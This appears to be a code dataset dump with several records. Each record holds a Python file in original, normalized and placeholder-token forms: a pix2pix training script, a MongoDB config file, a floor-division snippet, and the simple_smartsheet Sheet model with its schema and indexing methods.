"from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset\nfrom pix2pix_training import training_session\n\nif __name__ == \"__main__\":\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n\n fit = training_session(\"_colorize_w\")\n fit(\n train_ds, 150, test_ds,\n )\n\n",
"from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset\nfrom pix2pix_training import training_session\nif __name__ == '__main__':\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n fit = training_session('_colorize_w')\n fit(train_ds, 150, test_ds)\n",
"<import token>\nif __name__ == '__main__':\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n fit = training_session('_colorize_w')\n fit(train_ds, 150, test_ds)\n",
"<import token>\n<code token>\n"
] | false |
99,849 | 147520c7d23c0f4acb305afe665d014bc97f046d | #-*- coding: utf8 -*-
#IS_TEST
IS_TEST = False  # whether to run in test mode
#mongo conn settings
mongo_ip = '10.245.146.37'
mongo_db_name = 'idomains_mine'
mongo_db_name_samples = 'domain_set'
mongo_clusters_table = "clusters"
mongo_similar_domains_table = 'similar_domains'
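# Editorial sketch of how the Mongo settings above might be consumed (the original
# file only defines them; pymongo is an assumption, not something imported here):
#
#     from pymongo import MongoClient
#     client = MongoClient(mongo_ip)
#     clusters = client[mongo_db_name][mongo_clusters_table]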
#exper samples file name
samples_file_name = 'exper_file/www577789.com_sample.pkl'
#tld list file name
tld_list_fn = 'SDM/req_file/tld_list.pkl'
#dns server file name
dns_server_file_name = 'SDM/req_file/dns_servers.txt'
 | [
"#-*- coding: utf8 -*-\n#IS_TEST\nIS_TEST = False#是否测试\n\n#mongo conn settings\nmongo_ip = '10.245.146.37'\nmongo_db_name = 'idomains_mine'\nmongo_db_name_samples = 'domain_set'\nmongo_clusters_table = \"clusters\"\nmongo_similar_domains_table = 'similar_domains'\n\n#exper samples file name\nsamples_file_name = 'exper_file/www577789.com_sample.pkl'\n#tld list file name\ntld_list_fn = 'SDM/req_file/tld_list.pkl'\n#dns server file name\ndns_server_file_name = 'SDM/req_file/dns_servers.txt'",
"IS_TEST = False\nmongo_ip = '10.245.146.37'\nmongo_db_name = 'idomains_mine'\nmongo_db_name_samples = 'domain_set'\nmongo_clusters_table = 'clusters'\nmongo_similar_domains_table = 'similar_domains'\nsamples_file_name = 'exper_file/www577789.com_sample.pkl'\ntld_list_fn = 'SDM/req_file/tld_list.pkl'\ndns_server_file_name = 'SDM/req_file/dns_servers.txt'\n",
"<assignment token>\n"
] | false |
99,850 | f96ec3a5ecd56028852601487f27a9af0de68bed | # -*- coding: utf-8 -*-
v = 2 // -8
print(v)
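# Worked check (editorial addition): // floors toward negative infinity, while /
# keeps the exact quotient, which is why v above is -1.
assert 2 / -8 == -0.25                  # true division
assert 2 // -8 == -1                    # floor(-0.25) == -1
assert -2 // 8 == -1                    # a negative operand on either side rounds the same way
assert 7 // 2 == 3 and -7 // 2 == -4    # floor division is not truncation toward zero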
| [
"# -*- coding: utf-8 -*-\n\nv=(2)//-8\nprint(v)\n \n",
"v = 2 // -8\nprint(v)\n",
"<assignment token>\nprint(v)\n",
"<assignment token>\n<code token>\n"
] | false |
99,851 | 5bdfcd6a641c8e259212d6194309854b5b1f5b2a | import logging
from datetime import datetime
from typing import (
Optional,
Dict,
List,
ClassVar,
Generic,
Type,
TypeVar,
Tuple,
Any,
Union,
cast,
TYPE_CHECKING,
)
import attr
from marshmallow import fields, pre_load
from simple_smartsheet import config
from simple_smartsheet import exceptions
from simple_smartsheet import utils
from simple_smartsheet.types import IndexKeysDict, IndexesType
from simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject
from simple_smartsheet.models.cell import Cell
from simple_smartsheet.models.column import Column, ColumnSchema, ColumnType
from simple_smartsheet.models.row import Row, RowSchema, _RowBase
if TYPE_CHECKING:
try:
import pandas as pd
except ImportError:
pass
logger = logging.getLogger(__name__)
class UserSettingsSchema(Schema):
critical_path_enabled = fields.Bool(data_key="criticalPathEnabled")
display_summary_tasks = fields.Bool(data_key="displaySummaryTasks")
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class UserSettings(Object):
critical_path_enabled: bool
display_summary_tasks: bool
class UserPermissionsSchema(Schema):
summary_permissions = fields.Str(data_key="summaryPermissions")
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class UserPermissions(Object):
summary_permissions: str
class WorkspaceSchema(Schema):
id = fields.Int()
name = fields.Str()
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class Workspace(Object):
id: int
name: str
class SheetSchema(CoreSchema):
"""Marshmallow Schema for Smartsheet Sheet object
Additional details about fields can be found here:
http://smartsheet-platform.github.io/api-docs/#sheets
"""
id = fields.Int()
name = fields.Str()
access_level = fields.Str(data_key="accessLevel")
permalink = fields.Str()
favorite = fields.Bool()
created_at = fields.DateTime(data_key="createdAt")
modified_at = fields.DateTime(data_key="modifiedAt")
version = fields.Int()
total_row_count = fields.Int(data_key="totalRowCount")
effective_attachment_options = fields.List(
fields.Str(), data_key="effectiveAttachmentOptions"
)
gantt_enabled = fields.Bool(data_key="ganttEnabled")
read_only = fields.Bool(data_key="readOnly")
dependencies_enabled = fields.Bool(data_key="dependenciesEnabled")
resource_management_enabled = fields.Bool(data_key="resourceManagementEnabled")
cell_image_upload_enabled = fields.Bool(data_key="cellImageUploadEnabled")
user_settings = fields.Nested(UserSettingsSchema, data_key="userSettings")
user_permissions = fields.Nested(UserPermissionsSchema, data_key="userPermissions")
has_summary_fields = fields.Bool(data_key="hasSummaryFields")
is_multi_picklist_enabled = fields.Bool(data_key="isMultiPicklistEnabled")
columns = fields.List(fields.Nested(ColumnSchema))
rows = fields.List(fields.Nested(RowSchema))
workspace = fields.Nested(WorkspaceSchema)
class Meta:
unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)
ordered = True
@pre_load
def update_context(self, data, many: bool, **kwargs):
self.context["column_id_to_type"] = {}
return data
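# Editorial note (not in the original source): the data_key arguments above map
# Smartsheet's camelCase JSON keys onto the schema's snake_case attributes on load.
# A minimal standalone sketch, assuming marshmallow 3.x:
#
#     import marshmallow
#
#     class DemoSchema(marshmallow.Schema):
#         access_level = marshmallow.fields.Str(data_key="accessLevel")
#
#     DemoSchema().load({"accessLevel": "VIEWER"})  # -> {'access_level': 'VIEWER'}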
RowT = TypeVar("RowT", bound=_RowBase[Any])
ColumnT = TypeVar("ColumnT", bound=Column)
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class _SheetBase(CoreObject, Generic[RowT, ColumnT]):
"""Represents Smartsheet Sheet object
Additional details about fields can be found here:
http://smartsheet-platform.github.io/api-docs/#sheets
Extra attributes:
indexes: contains all built indices
"""
name: str
id: Optional[int] = None
access_level: Optional[str] = None
permalink: Optional[str] = None
favorite: Optional[bool] = None
created_at: Optional[datetime] = None
modified_at: Optional[datetime] = None
version: Optional[int] = None
total_row_count: Optional[int] = None
effective_attachment_options: List[str] = attr.Factory(list)
gantt_enabled: Optional[bool] = None
read_only: Optional[bool] = None
dependencies_enabled: Optional[bool] = None
resource_management_enabled: Optional[bool] = None
cell_image_upload_enabled: Optional[bool] = None
user_settings: Optional[UserSettings] = None
user_permissions: Optional[UserPermissions] = None
has_summary_fields: Optional[bool] = None
is_multi_picklist_enabled: Optional[bool] = None
columns: List[ColumnT] = attr.Factory(list)
rows: List[RowT] = attr.Factory(list)
workspace: Optional[Workspace] = None
_row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)
_row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)
_column_title_to_column: Dict[str, ColumnT] = attr.ib(
attr.Factory(dict), init=False
)
_column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict), init=False)
indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)
_schema: ClassVar[Type[SheetSchema]] = SheetSchema
def __attrs_post_init__(self) -> None:
self._update_column_lookup()
self._update_row_cell_lookup()
def _update_column_lookup(self) -> None:
self._column_title_to_column.clear()
self._column_id_to_column.clear()
for column in self.columns:
column_id = column._id
if column_id is None:
continue
self._column_id_to_column[column_id] = column
column_title = column.title
if column_title is None:
continue
if column_title in self._column_title_to_column:
logger.info(
"Column with the title %s is already present in the index",
column_title,
)
self._column_title_to_column[column_title] = column
def _update_row_cell_lookup(self) -> None:
self._row_num_to_row.clear()
self._row_id_to_row.clear()
for row in self.rows:
if row.num:
self._row_num_to_row[row.num] = row
if row.id:
self._row_id_to_row[row.id] = row
row._update_cell_lookup(self)
def build_index(self, indexes: List[IndexKeysDict]) -> None:
for index in indexes:
columns = index["columns"]
unique = index["unique"]
self.indexes[columns] = {"index": {}, "unique": unique}
for row in self.rows:
row._update_index(self)
def get_row(
self,
row_num: Optional[int] = None,
row_id: Optional[int] = None,
filter: Optional[Dict[str, Any]] = None,
) -> Optional[RowT]:
"""Returns Row object by row number or ID
Either row_num or row_id must be provided
Args:
row_num: row number
row_id: row id
            filter: a dictionary with column title to value
                mappings in the same order as the index was built. The index must be unique.
        Returns:
            Row object, or None if no matching row is found
"""
if row_num is not None:
return self._row_num_to_row.get(row_num)
elif row_id is not None:
return self._row_id_to_row.get(row_id)
elif filter is not None:
columns, query = zip(*sorted(filter.items()))
index_dict = self.indexes.get(columns)
if index_dict is None:
raise exceptions.SmartsheetIndexNotFound(
f"Index {columns} is not found, "
f"build it first with build_index method"
)
unique = index_dict["unique"]
if not unique:
raise exceptions.SmartsheetIndexNotUnique(
f"Index {columns} is non-unique and lookup will potentially "
"return multiple rows, use get_rows method instead"
)
index = cast(Dict[Tuple[Any, ...], RowT], index_dict["index"])
return index[query]
else:
raise ValueError("Either row_num or row_id argument should be provided")
def get_rows(self, filter: Dict[str, Any]) -> List[RowT]:
"""Returns Row objects by index query
Args:
            filter: a dictionary or ordered dictionary with column title to value
                mappings in the same order as the index was built. The index must be non-unique.
        Returns:
            list of matching Row objects (empty if none match)
"""
columns, query = zip(*sorted(filter.items()))
index_dict = self.indexes.get(columns)
if index_dict is None:
raise exceptions.SmartsheetIndexNotFound(
f"Index {columns} is not found, "
f"build it first with build_index method"
)
unique = index_dict["unique"]
if unique:
unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict["index"])
result = unique_index.get(query)
if result is not None:
return [result]
else:
return []
else:
non_unique_index = cast(
Dict[Tuple[Any, ...], List[RowT]], index_dict["index"]
)
return non_unique_index.get(query, [])
def get_column(
self, column_title: Optional[str] = None, column_id: Optional[int] = None
) -> ColumnT:
"""Returns Column object by column title or ID
Either column_title or column_id must be provided
Args:
column_title: column title (case-sensitive)
column_id: column id
Returns:
Column object
"""
if column_title is not None:
return self._column_title_to_column[column_title]
elif column_id is not None:
return self._column_id_to_column[column_id]
else:
raise ValueError(
"Either column_title or column_id argument should be provided"
)
def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:
"""Returns a list of dictionaries with column titles and cell values"""
return [row.as_dict() for row in self.rows]
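# Usage sketch (editorial addition, not part of the library): after loading a sheet,
# build_index enables dictionary-style row lookups. The column titles below
# ("Email", "Team") are hypothetical.
#
#     sheet.build_index([
#         {"columns": ("Email",), "unique": True},
#         {"columns": ("Team",), "unique": False},
#     ])
#     row = sheet.get_row(filter={"Email": "[email protected]"})   # unique index
#     rows = sheet.get_rows(filter={"Team": "backend"})           # non-unique index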
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class Sheet(_SheetBase[Row, Column]):
columns: List[Column] = cast(List[Column], attr.Factory(list))
rows: List[Row] = attr.Factory(list)
def make_cell(self, column_title: str, field_value: Any) -> Cell:
"""Creates a Cell object for an existing column
Args:
column_title: title of an existing column
field_value: value of the cell
Returns:
Cell object
"""
column = self.get_column(column_title)
if column is None:
            raise ValueError(
                f"A column with the title {column_title!r} does not exist in this sheet"
            )
if column.type == ColumnType.MULTI_PICKLIST:
if not column.id:
raise ValueError(f"Column {column!r} does not have ID")
cell = Cell.create_multi_picklist(column_id=column.id, values=field_value)
else:
cell = Cell(column_id=column.id, value=field_value)
return cell
def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:
"""Create a list of Cell objects from dictionary
Args:
fields: dictionary where key is a column title and value is a cell value
Returns:
list of Cell objects
"""
result: List[Cell] = []
for column_title, field_value in fields.items():
result.append(self.make_cell(column_title, field_value))
return result
def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:
"""Returns a list of dictionaries with column titles and cell values"""
return [row.as_dict() for row in self.rows]
def as_dataframe(self) -> "pd.DataFrame":
"""Return the sheet as pandas DataFrame
        Columns will include row id, row number and all columns from the sheet
Pandas must be installed either separately or as extras:
`pip install simple-smartsheet[pandas]`
"""
import pandas as pd
df = pd.DataFrame([row.as_series() for row in self.rows])
return df
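# Usage sketch (editorial addition): given a populated Sheet instance, cells for a new
# or updated row can be built from a plain dict, and the whole sheet can be exported
# to pandas. The column titles here are hypothetical.
#
#     cells = sheet.make_cells({"Name": "Alice", "Status": "Done"})
#     df = sheet.as_dataframe()  # requires pandas (simple-smartsheet[pandas])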
| [
"import logging\nfrom datetime import datetime\nfrom typing import (\n Optional,\n Dict,\n List,\n ClassVar,\n Generic,\n Type,\n TypeVar,\n Tuple,\n Any,\n Union,\n cast,\n TYPE_CHECKING,\n)\n\nimport attr\nfrom marshmallow import fields, pre_load\n\nfrom simple_smartsheet import config\nfrom simple_smartsheet import exceptions\nfrom simple_smartsheet import utils\nfrom simple_smartsheet.types import IndexKeysDict, IndexesType\nfrom simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject\nfrom simple_smartsheet.models.cell import Cell\nfrom simple_smartsheet.models.column import Column, ColumnSchema, ColumnType\nfrom simple_smartsheet.models.row import Row, RowSchema, _RowBase\n\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key=\"criticalPathEnabled\")\n display_summary_tasks = fields.Bool(data_key=\"displaySummaryTasks\")\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key=\"summaryPermissions\")\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key=\"accessLevel\")\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key=\"createdAt\")\n modified_at = fields.DateTime(data_key=\"modifiedAt\")\n\n version = fields.Int()\n total_row_count = fields.Int(data_key=\"totalRowCount\")\n effective_attachment_options = fields.List(\n fields.Str(), data_key=\"effectiveAttachmentOptions\"\n )\n gantt_enabled = fields.Bool(data_key=\"ganttEnabled\")\n read_only = fields.Bool(data_key=\"readOnly\")\n dependencies_enabled = fields.Bool(data_key=\"dependenciesEnabled\")\n resource_management_enabled = fields.Bool(data_key=\"resourceManagementEnabled\")\n cell_image_upload_enabled = fields.Bool(data_key=\"cellImageUploadEnabled\")\n user_settings = fields.Nested(UserSettingsSchema, data_key=\"userSettings\")\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\"userPermissions\")\n has_summary_fields = fields.Bool(data_key=\"hasSummaryFields\")\n is_multi_picklist_enabled = fields.Bool(data_key=\"isMultiPicklistEnabled\")\n\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context[\"column_id_to_type\"] = {}\n return data\n\n\nRowT = TypeVar(\"RowT\", bound=_RowBase[Any])\nColumnT = TypeVar(\"ColumnT\", bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet 
object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(\n attr.Factory(dict), init=False\n )\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict), init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) -> None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) -> None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n \"Column with the title %s is already present in the index\",\n column_title,\n )\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) -> None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n\n if row.id:\n self._row_id_to_row[row.id] = row\n\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) -> None:\n for index in indexes:\n columns = index[\"columns\"]\n unique = index[\"unique\"]\n self.indexes[columns] = {\"index\": {}, \"unique\": unique}\n\n for row in self.rows:\n row._update_index(self)\n\n def get_row(\n self,\n row_num: Optional[int] = None,\n row_id: Optional[int] = None,\n filter: Optional[Dict[str, Any]] = None,\n ) -> Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f\"Index {columns} is not found, \"\n f\"build it first with build_index method\"\n )\n\n unique = index_dict[\"unique\"]\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f\"Index {columns} is non-unique and lookup will potentially \"\n \"return multiple rows, use get_rows method instead\"\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\"index\"])\n return index[query]\n else:\n raise ValueError(\"Either row_num or row_id argument should be provided\")\n\n def get_rows(self, filter: Dict[str, Any]) -> List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f\"Index {columns} is not found, \"\n f\"build it first with build_index method\"\n )\n\n unique = index_dict[\"unique\"]\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\"index\"])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(\n Dict[Tuple[Any, ...], List[RowT]], index_dict[\"index\"]\n )\n return non_unique_index.get(query, [])\n\n def get_column(\n self, column_title: Optional[str] = None, column_id: Optional[int] = None\n ) -> ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n \"Either column_title or column_id argument should be provided\"\n )\n\n def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) -> Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n \"A column with the title %s does not exist in this sheet\", column_title\n )\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f\"Column {column!r} does not have ID\")\n cell = Cell.create_multi_picklist(column_id=column.id, values=field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:\n \"\"\"Create a list of 
Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) -> \"pd.DataFrame\":\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"import logging\nfrom datetime import datetime\nfrom typing import Optional, Dict, List, ClassVar, Generic, Type, TypeVar, Tuple, Any, Union, cast, TYPE_CHECKING\nimport attr\nfrom marshmallow import fields, pre_load\nfrom simple_smartsheet import config\nfrom simple_smartsheet import exceptions\nfrom simple_smartsheet import utils\nfrom simple_smartsheet.types import IndexKeysDict, IndexesType\nfrom simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject\nfrom simple_smartsheet.models.cell import Cell\nfrom simple_smartsheet.models.column import Column, ColumnSchema, ColumnType\nfrom simple_smartsheet.models.row import Row, RowSchema, _RowBase\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\nRowT = TypeVar('RowT', bound=_RowBase[Any])\nColumnT = TypeVar('ColumnT', bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n 
http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) ->None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n if row.id:\n self._row_id_to_row[row.id] = row\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) ->None:\n for index in indexes:\n columns = index['columns']\n unique = index['unique']\n self.indexes[columns] = {'index': {}, 'unique': unique}\n for row in self.rows:\n row._update_index(self)\n\n def get_row(self, row_num: Optional[int]=None, row_id: Optional[int]=\n None, filter: Optional[Dict[str, Any]]=None) ->Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. 
